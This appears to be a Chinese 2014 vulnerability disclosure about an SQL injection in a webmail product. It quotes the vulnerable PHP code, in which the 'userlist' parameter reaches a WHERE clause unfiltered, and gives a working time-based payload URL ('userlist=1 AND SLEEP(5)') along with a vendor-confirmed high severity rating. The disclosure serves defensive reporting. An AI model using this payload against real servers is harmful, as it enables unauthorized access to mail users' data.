2014-08-19: 细节已通知厂商并且等待厂商处理中 2014-08-23: 厂商已经确认,细节仅向厂商公开 2014-08-26: 细节向第三方安全合作伙伴开放 2014-10-17: 细节向核心白帽子及相关领域专家公开 2014-10-27: 细节向普通白帽子公开 2014-11-06: 细节向实习白帽子公开 2014-11-17: 细节向公众公开
看到路人甲大牛又发威了,感觉这洞再捂就烂了...
漏洞文件:client\oab\module\operates.phpLine: 321
if(ACTION == "save-to-pab"){ include_once(LIB_PATH."PAB.php"); $PAB = PAB::getinstance(); $maillist_id = gss($_GET['maillist']); if($maillist_id) { ... } else { $user_ids = gss( $_GET['userlist'] ); //几乎无过滤,过滤空格和判断gpc if ( !$user_ids ) { dump_msg( "param_error", el( "参数错误!", "" ) ); } $where = "t1.UserID IN (".$user_ids.")"; //问题? $arr_tmp = $Mailbox->getMailboxInfo( $domain_id, $where, "", "", "", "", 0 );//跟踪getMailboxInfo $user_all = $arr_tmp['data']; if ( !$user_all ) { dump_json( array( "status" => TRUE, "message" => "" ) ); } foreach ( $user_all as $user ) { $qq = $msn = ""; if ( strpos( $user['qqmsn'], "@" ) ) { $msn = $user['qqmsn']; } else { $qq = $user['qqmsn']; } if ( !$PAB->getContactByMail( $user_id, $user['email'], "contact_id", 0 ) ) { $data = array( "user_id" => $user_id, "fullname" => $user['FullName'], "pref_email" => $user['email'], "pref_tel" => $user['teleextension'] ? $user['teleextension'] : $user['mobil'], "birthday" => $user['birthday'], "im_qq" => $qq, "im_msn" => $msn, "updated" => date( "Y-m-d H:i:s" ) ); $res = $PAB->add_contact( $data, 0 ); if ( !$res ) { dump_json( array( "status" => FALSE, "message" => el( "添加联系人时发生错误,添加失败!", "" ) ) ); } } } } dump_json( array( "status" => TRUE, "message" => "" ) );}function gss( $_obfuscate_xyiNieq6, $_obfuscate_l9WoIzJ5Xg = FALSE ){ $_obfuscate_xyiNieq6 = trim( $_obfuscate_xyiNieq6 ); if ( !ini_get( "magic_quotes_gpc" ) && $_obfuscate_l9WoIzJ5Xg ) { $_obfuscate_xyiNieq6 = addslashes( $_obfuscate_xyiNieq6 ); } return $_obfuscate_xyiNieq6;}public function getMailboxInfo( $_obfuscate_AkPSczrCIu40, $_obfuscate_IRFhnYw = "", $_obfuscate_AedrEg = "", $_obfuscate_xvYeh9I = "", $_obfuscate_tUi30UB0e88 = "", $_obfuscate_u5srL4rM3PZJLvpPhQ = FALSE, $_obfuscate_ySeUHBw = FALSE ){ $_obfuscate_zbtFQY92OYenSG9u = "t1.DomainID='".$_obfuscate_AkPSczrCIu40."' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0"; if ( $_obfuscate_IRFhnYw ) { $_obfuscate_zbtFQY92OYenSG9u .= " AND ".$_obfuscate_IRFhnYw;//这行就足矣,代入SQL语句了 } ....
payload: http://mail.domain.com/webmail/client/oab/index.php?module=operate&action=save-to-pab&userlist=1 AND SLEEP(5)SQLMAP截图证明:
过滤
危害等级:高
漏洞Rank:14
确认时间:2014-08-23 23:38
暂无
obviously